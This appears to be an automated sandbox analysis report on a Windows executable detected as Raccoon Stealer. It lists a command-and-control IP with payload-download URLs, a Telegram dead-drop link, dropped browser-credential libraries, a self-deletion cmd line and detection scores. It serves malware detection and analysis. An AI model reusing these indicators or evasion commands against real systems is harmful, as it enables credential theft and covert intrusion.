ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150

Source: Aqlmlmmeey.exe, 00000000.00000002.272808697.00000000054BC000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp, Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae78
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae7w
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150//l/f/GpHpKnwB3dP17SpzaKnS/9801dace6a5ab5b92aa19fd0ea4e73710d7a6a98
Source: Aqlmlmmeey.exe, 00000000.00000002.272808697.00000000054BC000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/M
Source: Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150:80//l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aaegdcncolp
Source: Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150:80/779676D92903688rome
Source: qipcap.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: qipcap.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp, nssckbi.dll.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://ocsp.accv.es0
Source: qipcap.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: qipcap.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: qipcap.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: qipcap.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: qipcap.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: qipcap.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: qipcap.dll.0.dr	String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.0.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: Aqlmlmmeey.exe, 00000000.00000002.272808697.00000000054BC000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Aqlmlmmeey.exe, 00000000.00000002.271572630.0000000002EA7000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=R
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.0.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp, Aqlmlmmeey.exe, 00000000.00000002.271572630.0000000002EA7000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/agrybirdsgamerept
Source: Aqlmlmmeey.exe, 00000000.00000002.271618313.0000000002EEC000.00000004.00000001.sdmp	String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel05
Source: qipcap.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Aqlmlmmeey.exe, 00000000.00000003.269713467.00000000054BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static
Source: Aqlmlmmeey.exe, 00000000.00000002.272808697.00000000054BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0o
Source: Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0pC
Source: Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0rs
Source: Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0usp
Source: Aqlmlmmeey.exe, 00000000.00000003.269771421.000000000542F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0usp
Source: RYwTiizs2t.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150

Source: unknown

DNS traffic detected: queries for: t.me

Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: GET //l/f/GpHpKnwB3dP17SpzaKnS/9801dace6a5ab5b92aa19fd0ea4e73710d7a6a98 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/GpHpKnwB3dP17SpzaKnS/405431785963a051c32213179fa2e9bea8d07aae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49730 version: TLS 1.2

Source: Aqlmlmmeey.exe, 00000000.00000002.271517215.0000000002E4A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.30c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Aqlmlmmeey.exe.3150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Aqlmlmmeey.exe.3150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.30c0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aqlmlmmeey.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.271763487.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250736320.0000000003150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Aqlmlmmeey.exe PID: 5164, type: MEMORYSTR

Source: Aqlmlmmeey.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0040E139	0_2_0040E139
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0043E2E4	0_2_0043E2E4
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0042A2F9	0_2_0042A2F9
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0043628C	0_2_0043628C
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0042C383	0_2_0042C383
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_00410648	0_2_00410648
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_004206DD	0_2_004206DD
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0040CF54	0_2_0040CF54
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_004210B1	0_2_004210B1
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0040F2E6	0_2_0040F2E6
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_004373C6	0_2_004373C6
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0040D684	0_2_0040D684
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_00437819	0_2_00437819
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0041FD36	0_2_0041FD36
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0040BF59	0_2_0040BF59
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Code function: 0_2_0041E014	0_2_0041E014

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: String function: 00467790 appears 45 times

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: Aqlmlmmeey.exe, 00000000.00000002.273723918.000000006F432000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs Aqlmlmmeey.exe
Source: Aqlmlmmeey.exe, 00000000.00000002.273630063.000000006ED8B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamenss3.dll8 vs Aqlmlmmeey.exe
Source: Aqlmlmmeey.exe, 00000000.00000003.269735372.00000000054D8000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs Aqlmlmmeey.exe

Source: sqlite3.dll.0.dr

Static PE information: Number of sections : 18 > 10

Source: Aqlmlmmeey.exe	Virustotal: Detection: 48%
Source: Aqlmlmmeey.exe	ReversingLabs: Detection: 40%

Source: Aqlmlmmeey.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Aqlmlmmeey.exe 'C:\Users\user\Desktop\Aqlmlmmeey.exe'
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\Aqlmlmmeey.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\Aqlmlmmeey.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\Aqlmlmmeey.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK	Jump to behavior

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

File created: C:\Users\user\AppData\LocalLow\sqlite3.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/67@1/2

Source: C:\Users\user\Desktop\Aqlmlmmeey.exe

Code function: 0_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

0_2_0042A224

Source: softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: Aqlmlmmeey.exe, 00000000.00000002.273572336.000000006ED50000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
